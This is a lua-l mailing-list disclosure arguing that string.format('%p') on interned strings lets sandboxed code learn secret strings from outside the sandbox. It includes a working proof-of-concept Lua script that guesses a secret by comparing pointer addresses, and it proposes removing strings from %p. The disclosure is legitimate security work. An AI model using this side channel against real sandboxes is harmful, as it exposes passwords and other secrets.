From: Sergey Zakharchenko <doublef.mobile@gmail.com>
Date: Fri, 23 Aug 2024 16:47:35 +0300
Message-ID: <CADYCxoMrhxzgd+R7x-5dwNkGOrXAg0_F1mXcBN9k2XdAbSK03w@mail.gmail.com>
Subject: string.format("%p", <string>) might be problematic
To: lua-l@googlegroups.com

Hello list,

[I've shared this with Roberto and he asked me to move the discussion
to the mailing list].

Looks like the string pointer formatting functionality can be used to
brute force (short) strings contained in an environment outside the
sandbox. Those strings could be secret (and let's face it, many
user passwords fit the Lua definition of a short string).

I've looked through the mailing list discussions and I think there was
some string.format("%p",...) pushback but haven't found this exact
argument. Consider the following, really naive code, runnable as a
script and yielding the correct guess for me on x86-64 and MIPS 5.4.6
builds:

-- outside the sandbox
local secret = "bazfooquux"

-- somewhere inside the sandbox
-- allocate some memory to make a difference
local dummy_tbl = {}
for i=1,1000 do
    dummy_tbl[i] = string.format("%d",i)
end

local options = {"foo","bar","baz","quux"}

local answer_addr
local answer

for i1 = 1, #options do
    for i2 = 1, #options do
        for i3 = 1, #options do
            local guess = options[i1] .. options[i2] .. options[i3]
            local guess_addr = string.format("%p", guess)
            if not answer_addr or answer_addr > guess_addr then
                answer_addr = guess_addr
                answer = guess
            end
        end
    end
end

print("The secret is:", answer)

No other Lua type has the interning behaviour of strings, and regular
code should have no business getting their addresses; I suggest that
strings be dropped from the list of types handled by %p (and a null
pointer representation, for numbers, should be returned instead).

Best regards,

-- 
DoubleF

-- 
You received this message because you are subscribed to the Google Groups "lua-l" group.
To unsubscribe from this group and stop receiving emails from it, send an email to lua-l+unsubscribe@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/lua-l/CADYCxoMrhxzgd%2BR7x-5dwNkGOrXAg0_F1mXcBN9k2XdAbSK03w%40mail.gmail.com.